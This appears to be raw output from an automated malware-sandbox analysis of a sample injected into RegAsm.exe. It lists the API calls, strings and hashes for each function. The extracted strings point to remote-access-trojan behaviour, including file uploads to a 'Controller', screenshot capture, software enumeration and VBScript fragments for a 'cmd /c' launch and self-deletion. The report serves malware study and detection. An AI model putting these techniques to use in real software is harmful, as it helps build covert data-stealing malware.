                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                                                                            • _wcslen.LIBCMT ref: 0041C13B
                                                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                                                                                            • GetLastError.KERNEL32 ref: 0041C173
                                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                                                                            • GetLastError.KERNEL32 ref: 0041C1D0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                            • String ID: ?
                                                                                                                            • API String ID: 3941738427-1684325040
                                                                                                                            • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                                                                            • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                                                                            • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                                                                            • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strlen
                                                                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                            • API String ID: 4218353326-230879103
                                                                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                            • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                            • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$EnvironmentVariable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1464849758-0
                                                                                                                            • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                            • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                                                                            • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                            • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                                                                            • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEnumOpen
                                                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                            • API String ID: 1332880857-3714951968
                                                                                                                            • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                                                                            • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                                                                            • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                                                                            • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                                                                            APIs
                                                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                                                                            • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                                                                            • ExitProcess.KERNEL32 ref: 0041D665
                                                                                                                            • CreatePopupMenu.USER32 ref: 0041D66B
                                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                            • String ID: Close
                                                                                                                            • API String ID: 1657328048-3535843008
                                                                                                                            • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                                            • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                                                                            • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                                            • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2509303402-0
                                                                                                                            • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                                                                            • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                                                                            • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                                                                            • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                                                                            • __aulldiv.LIBCMT ref: 00408D4D
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                            • API String ID: 3086580692-2582957567
                                                                                                                            • Opcode ID: 630956c67a1bf9b9df31def35d309559cfb9d7766bf8ff8001d6b3273b4633de
                                                                                                                            • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                                                                            • Opcode Fuzzy Hash: 630956c67a1bf9b9df31def35d309559cfb9d7766bf8ff8001d6b3273b4633de
                                                                                                                            • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                                                                              • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                                                                                              • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                                                              • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                                                              • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                                                                                                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                            • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                            • API String ID: 3795512280-1152054767
                                                                                                                            • Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                                                                            • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                                                                            • Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                                                                            • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                                                                            APIs
                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                            • _free.LIBCMT ref: 10007CFB
                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                            • _free.LIBCMT ref: 10007D1D
                                                                                                                            • _free.LIBCMT ref: 10007D32
                                                                                                                            • _free.LIBCMT ref: 10007D3D
                                                                                                                            • _free.LIBCMT ref: 10007D5F
                                                                                                                            • _free.LIBCMT ref: 10007D72
                                                                                                                            • _free.LIBCMT ref: 10007D80
                                                                                                                            • _free.LIBCMT ref: 10007D8B
                                                                                                                            • _free.LIBCMT ref: 10007DC3
                                                                                                                            • _free.LIBCMT ref: 10007DCA
                                                                                                                            • _free.LIBCMT ref: 10007DE7
                                                                                                                            • _free.LIBCMT ref: 10007DFF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 161543041-0
                                                                                                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                            APIs
                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                                                                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                                                                            • _free.LIBCMT ref: 004512FF
                                                                                                                              • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                                                                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                            • _free.LIBCMT ref: 00451321
                                                                                                                            • _free.LIBCMT ref: 00451336
                                                                                                                            • _free.LIBCMT ref: 00451341
                                                                                                                            • _free.LIBCMT ref: 00451363
                                                                                                                            • _free.LIBCMT ref: 00451376
                                                                                                                            • _free.LIBCMT ref: 00451384
                                                                                                                            • _free.LIBCMT ref: 0045138F
                                                                                                                            • _free.LIBCMT ref: 004513C7
                                                                                                                            • _free.LIBCMT ref: 004513CE
                                                                                                                            • _free.LIBCMT ref: 004513EB
                                                                                                                            • _free.LIBCMT ref: 00451403
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 161543041-0
                                                                                                                            • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                            • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                                                                            • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                            • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00419FB9
                                                                                                                            • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                            • API String ID: 489098229-1431523004
                                                                                                                            • Opcode ID: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                                                                            • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                                                                            • Opcode Fuzzy Hash: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                                                                            • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                              • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                                                                              • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                                                                              • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                                                                            • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                            • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                            • API String ID: 1913171305-3159800282
                                                                                                                            • Opcode ID: 260fab9fb5891a43e4fef7b59b37253bdbc83e54b4a4747c2b6c438f3c1e3980
                                                                                                                            • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                                                                            • Opcode Fuzzy Hash: 260fab9fb5891a43e4fef7b59b37253bdbc83e54b4a4747c2b6c438f3c1e3980
                                                                                                                            • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 269201875-0
                                                                                                                            • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                            • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                                                                            • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                            • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                                                                                                            • GetLastError.KERNEL32 ref: 00455CEF
                                                                                                                            • __dosmaperr.LIBCMT ref: 00455CF6
                                                                                                                            • GetFileType.KERNEL32 ref: 00455D02
                                                                                                                            • GetLastError.KERNEL32 ref: 00455D0C
                                                                                                                            • __dosmaperr.LIBCMT ref: 00455D15
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                                                                            • GetLastError.KERNEL32 ref: 00455EB1
                                                                                                                            • __dosmaperr.LIBCMT ref: 00455EB8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                            • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                            • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                                                                            • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                            • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
